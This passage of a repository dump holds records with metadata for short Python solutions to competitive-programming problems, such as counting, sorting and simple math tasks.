"/ICL1902.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n c,s=0,0\n while(n>0):\n s=math.floor(math.sqrt(n))\n n-=s*s\n c+=1\n print(c) \n" }, { "alpha_fraction": 0.43465909361839294, "alphanum_fraction": 0.44034090638160706, "avg_line_length": 19.176469802856445, "blob_id": "f75081f13a9267e18d7ac16f78c4d1942b5b7d87", "content_id": "c27d85e4b5e62eadb133af642db9d03d9c6ebd43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/ALEXTASK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def gcd(a,b): \n if a == 0: \n return b \n return gcd(b % a, a) \n \ndef lcm(a,b): \n return (a*b) // gcd(a,b)\n\nfor _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n a.sort()\n s=[]\n for i in range(n):\n for j in range(i+1,n):\n s.append(lcm(a[i],a[j]))\n print(min(s))\n \n" }, { "alpha_fraction": 0.41228070855140686, "alphanum_fraction": 0.42690059542655945, "avg_line_length": 25.30769157409668, "blob_id": "57db7305f170327c1783183674aca65d9abeb3b9", "content_id": "4be63307d8e7e336a6d0169f1a000f33dab2561c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/TABLET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,b=[int(i) for i in input().split()]\n w,h,p=[0]*n,[0]*n,[0]*n\n for i in range(n):\n w[i],h[i],p[i]=[int(i) for i in input().split()]\n a=0\n for i in range(n):\n if(p[i]<=b and a<(w[i]*h[i])):\n a=w[i]*h[i]\n if(a==0):\n print(\"no tablet\")\n else:\n print(a)\n" }, { "alpha_fraction": 0.44694533944129944, "alphanum_fraction": 0.4565916359424591, 
"avg_line_length": 25.727272033691406, "blob_id": "2fecf055f5fe83803a4935d9cd9195f5954ae046", "content_id": "bd197dbbce1441bf3588938f022a3da3bbdd7912", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 39, "num_lines": 11, "path": "/MOVIEWKN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n l=[int(i) for i in input().split()]\n r=[int(i) for i in input().split()]\n k=[]\n for i in range(n):\n k.append(l[i]*r[i])\n if (k.count(max(k))==1):\n print(k.index(max(k))+1)\n else:\n print(r.index(max(r))+1)\n \n" }, { "alpha_fraction": 0.4920634925365448, "alphanum_fraction": 0.5132275223731995, "avg_line_length": 22.625, "blob_id": "f152a005c18ddb0c90cd8052cd2c67dc3d55ec65", "content_id": "9091f2dcee4bddcb101f8c200e0aac6eb70d211b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 8, "path": "/CHEFSTR1.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n s=[int(i) for i in input().split()]\n p=0\n for i in range(n-1):\n p+=math.fabs(s[i+1]-s[i])-1\n print(int(p))\n" }, { "alpha_fraction": 0.34510868787765503, "alphanum_fraction": 0.38315218687057495, "avg_line_length": 19.44444465637207, "blob_id": "6da66653dd5d5f5f0c6fab6cb75c1cb55046146a", "content_id": "77a0a78a7c1c6e627b59c0d5a17a11f5738e85c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 368, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/TICKETS5.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s = input()\n n = len(s)\n flag = 0\n 
if (n%2!=0):\n flag=1\n elif (s[0]==s[1]) and n==2:\n flag=1\n for i in range(n):\n if i+2 < n and s[i]==s[i+2] and s[i]!=s[i+1]:\n flag=0\n else:\n break\n \n if flag==0 and i==n-2:\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.3348519504070282, "alphanum_fraction": 0.35535308718681335, "avg_line_length": 21.210525512695312, "blob_id": "fcd2199b4c52ce324805a2b271996b2e8c0fab29", "content_id": "3f110d6c3e3a18b59df53c5ff6af8eced9f1126c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 439, "license_type": "no_license", "max_line_length": 36, "num_lines": 19, "path": "/COOMILK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input().split()\n flag=0\n for i in range(n):\n if(s[0]==\"cookie\" and n==1):\n flag+=1\n break\n if(s[n-1]==\"cookie\"):\n flag+=1\n break\n if(s[i]==\"cookie\"):\n if(s[i+1]!=\"milk\"):\n flag+=1\n break\n if(flag==0):\n print(\"YES\")\n else:\n print(\"NO\")\n \n" }, { "alpha_fraction": 0.48407644033432007, "alphanum_fraction": 0.5031847357749939, "avg_line_length": 25.16666603088379, "blob_id": "b960916d2da45859f1dbdc8c239a5decf6d404af", "content_id": "acb169bca7bb7d9ccdc7e18aaaacc88141b5362a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 41, "num_lines": 6, "path": "/PPSUM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n d,n=[int(i) for i in input().split()]\n s=0\n for i in range(d):\n n=sum([j for j in range(1,n+1)])\n print(n)\n" }, { "alpha_fraction": 0.30041152238845825, "alphanum_fraction": 0.3292181193828583, "avg_line_length": 21.714284896850586, "blob_id": "2c20cba2585654e6fc0f85cb2194146f1ec5ba35", "content_id": "50110d28a79f0d3da78a596351914fd772650a57", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 486, "license_type": "no_license", "max_line_length": 41, "num_lines": 21, "path": "/EXAM1.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n u=input()\n if s==u:\n print(n)\n else:\n k=0\n flag=0\n for i in range(n-1):\n if(s[i]==u[i] and flag==0):\n k+=1\n elif(u[i]=='N' and flag==0):\n k+=0\n elif(u[i]!=s[i] and flag==0):\n flag+=1\n else:\n flag=0\n if(flag==0 and s[n-1]==u[n-1]):\n k+=1\n print(k)\n \n" }, { "alpha_fraction": 0.47297295928001404, "alphanum_fraction": 0.47876447439193726, "avg_line_length": 24.850000381469727, "blob_id": "76dc0144d3a525d320153c2d568b995a5b62e6ab", "content_id": "9ad8ac8ad21da9bb3b2b05605385bc5edf8123fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 518, "license_type": "no_license", "max_line_length": 42, "num_lines": 20, "path": "/TRUEDARE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range (int(input())):\n rt=int(input())\n tr=[int(i) for i in input().split()]\n rd=int(input())\n dr=[int(i) for i in input().split()]\n st=int(input())\n ts=[int(i) for i in input().split()]\n sd=int(input())\n ds=[int(i) for i in input().split()]\n count=0\n for t in set(ts):\n if t in set(tr):\n count+=1\n for d in set(ds):\n if d in set(dr):\n count+=1\n if count==(len(set(ts))+len(set(ds))):\n print(\"yes\")\n else:\n print(\"no\") \n" }, { "alpha_fraction": 0.3781512677669525, "alphanum_fraction": 0.4117647111415863, "avg_line_length": 16, "blob_id": "1cd9e48c65af101ce0e3e2ce4a38ed053b878580", "content_id": "5ef8e281ca6aea6956a4aa0ae534c318e7eb3c9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 29, "num_lines": 
7, "path": "/TRICOIN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s,i=0,1\n while(s<=n):\n s+=i\n i+=1\n print(i-2)\n" }, { "alpha_fraction": 0.42236024141311646, "alphanum_fraction": 0.44720497727394104, "avg_line_length": 22, "blob_id": "0b9052e52a2977c7254e08cc3d904e2365298013", "content_id": "28f45831800d3705fcb7f4dc5846023b5d6d48e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 41, "num_lines": 7, "path": "/GDOG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n m,r=0,1\n for i in range(2,k+1):\n if(n%i>m):\n m=n%i\n print(m)\n" }, { "alpha_fraction": 0.36421725153923035, "alphanum_fraction": 0.3801916837692261, "avg_line_length": 18.66666603088379, "blob_id": "75674f827c4d3866536f98bf0da4777961b9c343", "content_id": "33bf5d803ee33636f38e1f5a6306eca7f3ee42f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CHFM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n s=0\n k=0\n for i in a:\n s+=i\n for i in range(n):\n if(s/n==(s-a[i])/(n-1)):\n k=i+1\n break\n if(k==0):\n print(\"Impossible\")\n else:\n print(k)\n \n \n" }, { "alpha_fraction": 0.35888078808784485, "alphanum_fraction": 0.3990267515182495, "avg_line_length": 23.176469802856445, "blob_id": "40ef497da8d7f960898dade8814a034b6ca52a1f", "content_id": "d1dd598da1d22148f4c78017a491575aa15ff272", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": 
"no_license", "max_line_length": 39, "num_lines": 34, "path": "/ARTBALAN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def hash_it(arr, s):\n for i in range(len(s)):\n arr[ord(s[i]) - 65] += 1 \n arr = sorted(arr, reverse = True) \n return arr\ndef balance(s, arr, l):\n val = len(set(s))\n res = 10000000000\n pp = 0\n for p in range(1,27):\n ptr = 0\n if l % p == 0:\n var = l // p\n for q in range(p):\n if arr[q] > var:\n ptr += arr[q] - var\n for q in range(p,26):\n if arr[q] > 0:\n ptr += arr[q]\n res = min(ptr,res)\n pp += 1\n if pp == 26:\n pp = 0 \n return(res) \n \nfor _ in range(int(input())): \n s = input() \n l = len(s) \n if l <= 2: \n print(0)\n continue\n arr = [0 for i in range(0,27)]\n arr = hash_it(arr,s)\n print(balance(s, arr, l))\n" }, { "alpha_fraction": 0.42105263471603394, "alphanum_fraction": 0.4421052634716034, "avg_line_length": 22.75, "blob_id": "39a091dcad1b6f4b4cfc86590a975b87e82a9fb2", "content_id": "c3b01f5500d6c81e284c071a572545b918c49de9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 41, "num_lines": 8, "path": "/CHN15A.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n s=[int(i) for i in input().split()]\n c=0\n for i in s:\n if((i+k)%7==0):\n c+=1\n print(c)\n" }, { "alpha_fraction": 0.4243176281452179, "alphanum_fraction": 0.44416874647140503, "avg_line_length": 20.83333396911621, "blob_id": "7248fa647067ea022d6194ff024ba561c5103e00", "content_id": "3e2076635b62199f23a6776c6aa05fa90907aaf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 403, "license_type": "no_license", "max_line_length": 39, "num_lines": 18, "path": "/CCOOK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", 
"text": "for _ in range(int(input())):\n a=[int(i) for i in input().split()]\n c=0\n for i in a:\n if(i==1):\n c+=1\n if(c==0):\n print(\"Beginner\")\n elif(c==1):\n print(\"Junior Developer\")\n elif(c==2):\n print(\"Middle Developer\")\n elif(c==3):\n print(\"Senior Developer\")\n elif(c==4):\n print(\"Hacker\")\n else:\n print(\"Jeff Dean\")\n \n \n" }, { "alpha_fraction": 0.4482758641242981, "alphanum_fraction": 0.4689655303955078, "avg_line_length": 23.16666603088379, "blob_id": "f2a3a77d52766de5d604e3ec4ac9c3bdcc100bc3", "content_id": "1328646ad7105643cbe7f129a39d13b4c45921b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 43, "num_lines": 6, "path": "/FLOW013.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b,c=[int(i) for i in input().split()]\n if(a+b+c==180):\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.39662447571754456, "alphanum_fraction": 0.4177215099334717, "avg_line_length": 20.545454025268555, "blob_id": "e7f35757c10d81ff733cce00aa408dc098aedf45", "content_id": "15c8a32c8f5afa38f1dd4cf06ece0dce42f300fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 30, "num_lines": 11, "path": "/MISSP.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a,p=[],n-1\n for i in range(n):\n a.append(int(input()))\n a.sort()\n for i in range(0,n-1,2):\n if(a[i]!=a[i+1]):\n p=i\n break;\n print(a[p])\n" }, { "alpha_fraction": 0.4032258093357086, "alphanum_fraction": 0.4233871102333069, "avg_line_length": 16.714284896850586, "blob_id": "b39efc3858dd5f89a64c32f11752cfc6365ca5cb", "content_id": "025d3c4f0613cad7d516ad94e9bf26c9fc09535f", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "no_license", "max_line_length": 39, "num_lines": 14, "path": "/PERMUT2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "while(True):\n n=int(input())\n if(n==0):\n break\n a=[int(i) for i in input().split()]\n b=[0]*n\n k=1\n for i in a:\n b[i-1]=k\n k+=1\n if(a==b):\n print(\"ambiguous\")\n else:\n print(\"not ambiguous\")\n" }, { "alpha_fraction": 0.5430463552474976, "alphanum_fraction": 0.5695364475250244, "avg_line_length": 14.100000381469727, "blob_id": "858a06c6323fdae18cc084666fcad7681439f0f7", "content_id": "bac7a211a8bcde00a0d2fc6e3508e8c786bd90e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 22, "num_lines": 10, "path": "/CHFIDEAL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import sys\nprint(\"3\")\nsys.stdout.flush()\nn = int(input())\nif n == 2:\n print(\"1\")\n sys.stdout.flush()\nelse:\n print(\"2\")\n sys.stdout.flush()\n" }, { "alpha_fraction": 0.29602888226509094, "alphanum_fraction": 0.3285198509693146, "avg_line_length": 22.81818199157715, "blob_id": "069bbf04d5cbbe8bda4379597ac805e2876788ad", "content_id": "85e9afd86c9a42099c5ecac989a37c2371cc0c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/PINS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for t in range(int(input())):\n n = int(input())\n print(1, end = \" \")\n if n%2 != 0:\n print(1,end = \"\")\n l = [0]*(n//2)\n print(*l, sep = \"\")\n else:\n print(1,end = \"\")\n l = [0]*((n-(n//2)))\n print(*l, sep = \"\")\n \n" }, { "alpha_fraction": 0.33528265357017517, "alphanum_fraction": 0.376218318939209, 
"avg_line_length": 25.947368621826172, "blob_id": "ba7f6dbe03a03178f1b4d9969cbc76de43e967d9", "content_id": "e81226b17d9d3284acb199319ffdb7c6d76bd51b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/EID2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a1,a2,a3,c1,c2,c3=[int(i) for i in input().split()]\n c=[c1,c2,c3]\n d=[c1,c2,c3]\n a=[a1,a2,a3]\n k=0\n for i in range(2):\n for j in range(i+1,3):\n if(a[i]>a[j]):\n a[i],a[j]=a[j],a[i]\n c[i],c[j]=c[j],c[i]\n if((a[i]==a[j] and c[i]!=c[j]) or(a[i]!=a[j] and c[i]==c[j])):\n k+=1;\n break;\n d.sort()\n if(k==0 and c==d):\n print(\"FAIR\")\n else:\n print(\"NOT FAIR\")\n\n" }, { "alpha_fraction": 0.47265625, "alphanum_fraction": 0.5234375, "avg_line_length": 33.13333511352539, "blob_id": "85230d8cb59894a2974fb57a64bfef5397cfe1b6", "content_id": "6e8991aed152fdb1671460e04de66a57969e45b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 65, "num_lines": 15, "path": "/COMM3.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n r=int(input())\n c=[int(i) for i in input().split()]\n hs=[int(i) for i in input().split()]\n sc=[int(i) for i in input().split()]\n d1=math.sqrt(math.pow(c[0]-hs[0],2)+math.pow(c[1]-hs[1],2))\n d2=math.sqrt(math.pow(c[0]-sc[0],2)+math.pow(c[1]-sc[1],2))\n d3=math.sqrt(math.pow(sc[0]-hs[0],2)+math.pow(sc[1]-hs[1],2))\n if(d1<=r and d2<=r):\n print(\"yes\")\n elif((d1<=r or d2<=r) and d3<=r):\n print(\"yes\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.2593320310115814, "alphanum_fraction": 0.2829076647758484, "avg_line_length": 18.5, "blob_id": 
"6f3ddf5dbac23da14761a16e118d2a78fd32d1f5", "content_id": "ff0a1198fca71f6155dd81d3f62eac600ca501a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 29, "num_lines": 26, "path": "/SNAKPROC.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n h,t=0,0\n for i in s:\n if(i=='H'):\n h+=1\n if(i=='T'):\n t+=1\n if(t!=h):\n print(\"Invalid\")\n else:\n k,p=0,0\n \n for i in s:\n if(i=='H'):\n k+=1\n if(i=='T'):\n k-=1\n if(k>1 or k<0):\n p=1\n break\n if(p==1):\n print(\"Invalid\")\n else:\n print(\"Valid\")\n \n" }, { "alpha_fraction": 0.3414634168148041, "alphanum_fraction": 0.40243902802467346, "avg_line_length": 21.363636016845703, "blob_id": "7bfc52d753fd0581f78f45a63ed626ac7c9a532f", "content_id": "5f24111ac7331839bac06bc39490a6d195c4d1c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 44, "num_lines": 11, "path": "/CFMM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=[\"\"]*n\n for i in range(n):\n s[i]=input()\n c=[0]*26\n for i in s:\n for j in i:\n c[ord(j)-97]+=1\n m=[c[2]//2,c[14],c[3],c[4]//2,c[7],c[5]]\n print(min(m))\n" }, { "alpha_fraction": 0.4264705777168274, "alphanum_fraction": 0.44117647409439087, "avg_line_length": 19.399999618530273, "blob_id": "1909a11e135c3df01e4602f93e950b99ac8ea9ba", "content_id": "36dbbfedbbc25bc83367856038ca9c8fd56acf53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/CNDLOVE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ 
in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=0\n for i in range(n):\n b=b+a[i]\n if(b%2==0):\n print(\"NO\")\n else:\n print(\"YES\")\n" }, { "alpha_fraction": 0.3268292546272278, "alphanum_fraction": 0.37560975551605225, "avg_line_length": 17.18181800842285, "blob_id": "d9c326eec2fadc731e379eb8596f1e7c99b3677b", "content_id": "b2a83aa61f120aed71c8f0b71467b4fb1ea115ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/FIBEASY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n if(n==1):\n print(0)\n elif(n<4):\n print(1)\n else:\n e=[0,9,2,3]\n a=len(bin(n))-3\n s=a%4\n print(e[s])\n \n" }, { "alpha_fraction": 0.4529148042201996, "alphanum_fraction": 0.49775785207748413, "avg_line_length": 18.81818199157715, "blob_id": "bfd8cd4dd1988ca2f332bb32213b91f445c1ff39", "content_id": "1f0b21eec2e01c8a4b8c1d8625994c89d651afca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 45, "num_lines": 11, "path": "/ELEVSTRS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n,v1,v2=[int(i) for i in input().split()]\n d1=2*n\n d2=math.sqrt(2)*n\n e=d1/v2\n s=d2/v1\n if(e>s):\n print(\"Stairs\")\n else:\n print(\"Elevator\")\n \n" }, { "alpha_fraction": 0.4170212745666504, "alphanum_fraction": 0.44255319237709045, "avg_line_length": 21.600000381469727, "blob_id": "d306a025e9294f6f7c7ec82ce594716743a15317", "content_id": "a4c7118b737439ac6560319603d7cddccc94310c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 39, 
"num_lines": 10, "path": "/CARSELL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n p=[int(i) for i in input().split()]\n mod=(10**9)+7\n s=0\n p.sort(reverse=True)\n for i in range(n):\n if((p[i]-i)>0):\n s+=p[i]-i\n print(s%mod)\n \n" }, { "alpha_fraction": 0.45098039507865906, "alphanum_fraction": 0.4803921580314636, "avg_line_length": 27.33333396911621, "blob_id": "087eec5dc4d321afeac6936d13c571530d9eaf5c", "content_id": "3d91e6204b2ccfc555f17db285f38ed58e697fd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 107, "num_lines": 18, "path": "/EVENT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s, e, l, r = [i for i in input().split()]\n day_dict = { \"saturday\":1,\"sunday\":2, \"monday\":3, \"tuesday\":4, \"wednesday\":5, \"thursday\":6, \"friday\":7}\n l = int(l)\n r = int(r)\n durr = day_dict[e]-day_dict[s]+1\n num = 0\n time_spent = 0\n for i in range(durr, r+1,7):\n if i>=l and i<=r:\n num += 1\n time_spent = i\n if num > 1:\n print(\"many\")\n elif num == 0:\n print(\"impossible\")\n else:\n print(time_spent)\n" }, { "alpha_fraction": 0.3163636326789856, "alphanum_fraction": 0.3527272641658783, "avg_line_length": 17.33333396911621, "blob_id": "a2e9300a2c8114833b5ac775b3fab762bb49b2bb", "content_id": "abc8ed58785c01a14c11a13bb100989690123711", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CPAIRS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n c,o=0,0\n for i in a:\n if(i%2!=0):\n o+=1\n i=0\n while(i<n):\n 
if(a[i]%2!=0):\n o-=1\n else:\n c+=o\n i+=1\n print(c)\n" }, { "alpha_fraction": 0.4012944996356964, "alphanum_fraction": 0.45954692363739014, "avg_line_length": 24, "blob_id": "8670e46c54364203d0be4cad831493fd2992ee36", "content_id": "01a64fbce81d78ecd0d8766d2dadb9d0d964b8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 309, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/CHRL4.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n,k=[int(i) for i in input().split()]\na=[int(i) for i in input().split()]\nmod=mod = (10**9)+7\np = [[a[0],0]]\nfor i in range(1,n):\n while p[0][1] + k < i:\n p.pop(0)\n temp = p[0][0]*a[i]\n while p[-1][0]>temp and len(p) != 1:\n p.pop(-1)\n p.append([temp,i])\nprint(p[-1][0]%mod)\n \n" }, { "alpha_fraction": 0.5338345766067505, "alphanum_fraction": 0.5413534045219421, "avg_line_length": 25.600000381469727, "blob_id": "8f8084edbd79bc31e5acf656c375fd21ccc18b02", "content_id": "dafda5f519d8ff762ecd6b9648085cd340aa228b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/EXUNA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n a.sort(reverse= True)\n print(a[n-1])\n" }, { "alpha_fraction": 0.46188339591026306, "alphanum_fraction": 0.48430493474006653, "avg_line_length": 23.77777862548828, "blob_id": "25804102a5ec1784251c4993e2112a5e82309e82", "content_id": "1f7bc320fb12a975314e6391fea7dfd897b142f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/MGCSET.py", "repo_name": "k0malSharma/Competitive-programming", 
"src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n,m=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n k=0\n for i in a:\n if (int(i%m)==0):\n k+=1\n print(int(math.pow(2,k)-1))\n" }, { "alpha_fraction": 0.4330708682537079, "alphanum_fraction": 0.4566929042339325, "avg_line_length": 16.14285659790039, "blob_id": "9a3b1ef2570672b5501c2a460f84f71d528f4f31", "content_id": "5e362e5fe38f142494ad71402c4d89b72da4b499", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 40, "num_lines": 7, "path": "/INTEST.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "a, b = [int(i) for i in input().split()]\nc=0\nfor i in range(a):\n d=int(input())\n if d%b==0:\n c+=1\nprint(c) \n" }, { "alpha_fraction": 0.3496503531932831, "alphanum_fraction": 0.4475524425506592, "avg_line_length": 19.428571701049805, "blob_id": "ddddeac364e334dc1939cca22d8ba11d014aacbb", "content_id": "63187078edd12078a1b9c8fc4b4dfdeef3c8bcef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/FLOW011.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=int(input())\n if s<1500:\n gs=s+(s*0.9)+(s*0.1)\n else:\n gs=s+500+(0.98*s)\n print(gs)\n" }, { "alpha_fraction": 0.4583333432674408, "alphanum_fraction": 0.4895833432674408, "avg_line_length": 15, "blob_id": "771a9d5da71877d23a69f7544aa14200e44b4505", "content_id": "48e613538accfe62feedbddd43bef584b9157135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/AMR15A.py", "repo_name": 
"k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\na=[int(i) for i in input().split()]\nx,y=0,0\nfor i in a:\n if(i%2==0):\n x+=1\n else:\n y+=1\nif (x>y):\n print(\"READY FOR BATTLE\")\nelse:\n print(\"NOT READY\")\n" }, { "alpha_fraction": 0.43939393758773804, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 22.625, "blob_id": "6b5ef888ed4ec37096ab7bdbc6ef7deb610803d8", "content_id": "f354925de48323c75df4c59901508c59a3af0040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/CHNGIT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n c=0\n for i in set(a):\n if(c<a.count(i)):\n c=a.count(i)\n print(len(a)-c)\n \n" }, { "alpha_fraction": 0.3687150776386261, "alphanum_fraction": 0.3854748606681824, "avg_line_length": 27.600000381469727, "blob_id": "c676b30ae24e74f14b7bad63560b28c169f94978", "content_id": "811dde33ef1ebc37e190da97742981c696886fa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 43, "num_lines": 5, "path": "/TWONMS.py", "repo_name": 